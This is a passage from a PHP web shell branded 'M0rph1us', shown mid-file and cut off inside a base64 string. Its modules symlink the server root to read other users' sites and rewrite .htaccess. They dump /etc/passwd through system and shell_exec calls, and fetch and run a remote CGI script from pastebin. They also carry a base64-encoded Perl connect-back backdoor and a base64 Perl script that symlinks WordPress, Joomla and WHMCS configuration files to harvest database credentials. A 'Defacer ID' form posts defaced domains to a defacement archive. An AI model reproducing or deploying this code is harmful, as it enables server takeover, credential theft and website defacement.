3454. AddType text/plain .php
3455. AddHandler text/plain .php
3456. Satisfy Any';
3457. $fp3 = fopen('.htaccess','w');
3458. $fw3 = fwrite($fp3,$file3);
3459. @fclose($fp3);
3460. echo "
3461. <table align=center border=1><tr>
3462. <td align=center><font size=3>S. No.</font></td>
3463. <td align=center><font size=3>Users</font></td>
3464. <td align=center><font size=3>Symlink</font></td></tr>";
3465. $dcount = 1;
3466. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
3467. while(!feof($file)){
3468. $s = fgets($file);
3469. $matches = array();
3470. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3471. $matches = str_replace("home/","",$matches[1]);
3472. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3473. continue;
3474. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
3475. <td align=center><font class=txt>" . $matches . "</td>";
3476. echo "<td align=center><font class=txt><a href=$full/M0rph1us_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
3477. $dcount++;}fclose($file);
3478. echo "</table>";}else{if($os != "Windows"){@mkdir("M0rph1us_sym",0777);@chdir("M0rph1us_sym");@exe("ln -s / root");$file3 = 'Options Indexes FollowSymLinks
3479. DirectoryIndex M0rph1us.htm
3480. AddType text/plain .php
3481. AddHandler text/plain .php
3482. Satisfy Any
3483. ';
3484. $fp3 = fopen('.htaccess','w');
3485. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
3486. echo "
3487. <div class='mybox'><h1 class='titulo'>SERVER SYMLINKER</h1>
3488. <table align=center border=1><tr>
3489. <td align=center><font size=3>ID</font></td>
3490. <td align=center><font size=3>Users</font></td>
3491. <td align=center><font size=3>Symlink</font></td></tr>";
3492. $temp = "";$val1 = 0;$val2 = 1000;
3493. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
3494. if ($uid)$temp .= join(':',$uid)."\n";}
3495. echo '<br/>';$temp = trim($temp);$file5 =
3496. fopen("test.txt","w");
3497. fputs($file5,$temp);
3498. fclose($file5);$dcount = 1;$file =
3499. fopen("test.txt", "r") or exit("Unable to open file!");
3500. while(!feof($file)){$s = fgets($file);$matches = array();
3501. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
3502. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3503. continue;
3504. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
3505. <td align=center><font class=txt>" . $matches . "</td>";
3506. echo "<td align=center><font class=txt><a href=$full/M0rph1us_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
3507. $dcount++;}
3508. fclose($file);
3509. echo "</table></div></center>";unlink("test.txt");
3510. } else
3511. echo "<center><font size=3>Cannot create Symlink</font></center>";
3512.  
3513. footer(); }
3514.  
3515. } }
3516.  
3517. // END SYMLINK HARD //
3518.  
3519. // DEFACER ID //
3520.  
3521. elseif($_GET['do'] == 'defid') {
3522. echo "<center><h1 class='titulo'>DEFACER.ID</h1></center><br>";
3523. echo "<center><form method='post'>
3524. <u>Defacer</u>: <br>
3525. <input type='text' name='hekel' size='50' value='M0rph1us'><br>
3526. <u>Team</u>: <br>
3527. <input type='text' name='tim' size='50' value='Mhph'><br>
3528. <u>Domains</u>: <br>
3529. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
3530. <input type='submit' name='go' value='Submit' style='width: 450px;'>
3531. </form>";
3532. $site = explode("\r\n", $_POST['sites']);
3533. $go = $_POST['go'];
3534. $hekel = $_POST['hekel'];
3535. $tim = $_POST['tim'];
3536. if($go) {
3537. foreach($site as $sites) {
3538. $zh = $sites;
3539. $form_url = "https://www.defacer.id/notify";
3540. $data_to_post = array();
3541. $data_to_post['attacker'] = "$hekel";
3542. $data_to_post['team'] = "$tim";
3543. $data_to_post['poc'] = 'SQL Injection';
3544. $data_to_post['url'] = "$zh";
3545. $curl = curl_init();
3546. curl_setopt($curl,CURLOPT_URL, $form_url);
3547. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
3548. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
3549. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
3550. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
3551. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
3552. $result = curl_exec($curl);
3553. echo $result;
3554. curl_close($curl);
3555. echo "<br>";
3556.  
3557.  
3558. footer();}
3559.  
3560. }
3561.  
3562. }
3563.  
3564. // END DEFACER ID //
3565.  
3566.  
3567.  
3568.  
3569. // CGI TELNET //
3570.  
3571.  
3572. elseif($_GET['do'] == 'cgi') {
3573. @mkdir('M0rph1us_cgi', 0755);
3574. @chdir("M0rph1us_cgi");
3575. $file_cgi = "cgi.cin";
3576. $isi_htcgi = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
3577. $htcgi = fopen(".htaccess", "w");
3578. $cgi_script = file_put_contents("http://pastebin.com/raw/wRc0svUF");
3579. $cgi = fopen($file_cgi, "w");
3580. fwrite($cgi, base64_decode($cgi_script));
3581. fwrite($htcgi, $isi_htcgi);
3582. chmod($file_cgi, 0755);
3583. /*$netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
3584. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
3585. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
3586. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
3587. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
3588. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
3589. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
3590. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
3591. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
3592. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
3593. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
3594. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
3595. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
3596. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
3597. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
3598. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
3599. YXRhY2hlZFxuXG4iOw==';
3600. $kike = fopen("M0rph1us_cgi/dc.pl" ,"w+");
3601. $sulat = fwrite ($kike ,base64_decode($netcatshell));
3602. fclose($kike);
3603. chmod("dc.pl",0755);
3604. */ echo "<center><h1 class='titulo'>CGI-TELNET 2k12</h1></center><br>";
3605. echo "<iframe src='M0rph1us_cgi/cgi.cin' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
3606.  
3607.  
3608. footer();}
3609.  
3610.  
3611.  
3612. // END CGI TELNET //
3613.  
3614.  
3615. // BYPASS PASSWORD //
3616.  
3617. elseif($_GET['do'] == 'passwbypass') {
3618. echo "<center><h1 class='titulo'>BYPASS ETC/PASSWD</h1></center><br>";
3619. echo '<center>Bypass etc/passw With:<br>
3620. <table style="width:50%">
3621. <tr>
3622. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
3623. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
3624. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
3625. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
3626. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
3627. </tr></table>Bypass User With : <table style="width:50%">
3628. <tr>
3629. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
3630. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
3631. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
3632. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
3633. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
3634. </tr>
3635. </table><br>';
3636.  
3637.  
3638. if ($_POST['awkuser']) {
3639. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3640. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
3641. echo "</textarea><br>";
3642. }
3643. if ($_POST['systuser']) {
3644. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3645. echo system("ls /var/mail");
3646. echo "</textarea><br>";
3647. }
3648. if ($_POST['passthuser']) {
3649. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3650. echo passthru("ls /var/mail");
3651. echo "</textarea><br>";
3652. }
3653. if ($_POST['exuser']) {
3654. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3655. echo exec("ls /var/mail");
3656. echo "</textarea><br>";
3657. }
3658. if ($_POST['shexuser']) {
3659. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3660. echo shell_exec("ls /var/mail");
3661. echo "</textarea><br>";
3662. }
3663. if($_POST['syst'])
3664. {
3665. echo"<textarea class='inputz' cols='65' rows='15'>";
3666. echo system("cat /etc/passwd");
3667. echo"</textarea><br><br><b></b><br>";
3668. }
3669. if($_POST['passth'])
3670. {
3671. echo"<textarea class='inputz' cols='65' rows='15'>";
3672. echo passthru("cat /etc/passwd");
3673. echo"</textarea><br><br><b></b><br>";
3674. }
3675. if($_POST['ex'])
3676. {
3677. echo"<textarea class='inputz' cols='65' rows='15'>";
3678. echo exec("cat /etc/passwd");
3679. echo"</textarea><br><br><b></b><br>";
3680. }
3681. if($_POST['shex'])
3682. {
3683. echo"<textarea class='inputz' cols='65' rows='15'>";
3684. echo shell_exec("cat /etc/passwd");
3685. echo"</textarea><br><br><b></b><br>";
3686. }
3687. echo '<center>';
3688. if($_POST['melex'])
3689. {
3690. echo"<textarea class='inputz' cols='65' rows='15'>";
3691. for($uid=0;$uid<60000;$uid++){
3692. $ara = posix_getpwuid($uid);
3693. if (!empty($ara)) {
3694. while (list ($key, $val) = each($ara)){
3695. print "$val:";
3696. }
3697. print "\n";
3698. }
3699. }
3700. echo"</textarea><br><br>";
3701.  
3702. footer();}
3703.  
3704. }
3705.  
3706. // END BYPASS PASSWORD //
3707.  
3708.  
3709.  
3710. // CONFIG //
3711.  
3712. elseif($_GET['do'] == 'config') {
3713. $idx = mkdir("idx_config", 0777);
3714. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
3715. $htc = fopen("idx_config/.htaccess","w");
3716. fwrite($htc, $isi_htc);
3717. fclose($htc);
3718. if(preg_match("/vhosts|vhost/", $dir)) {
3719. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3720. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycu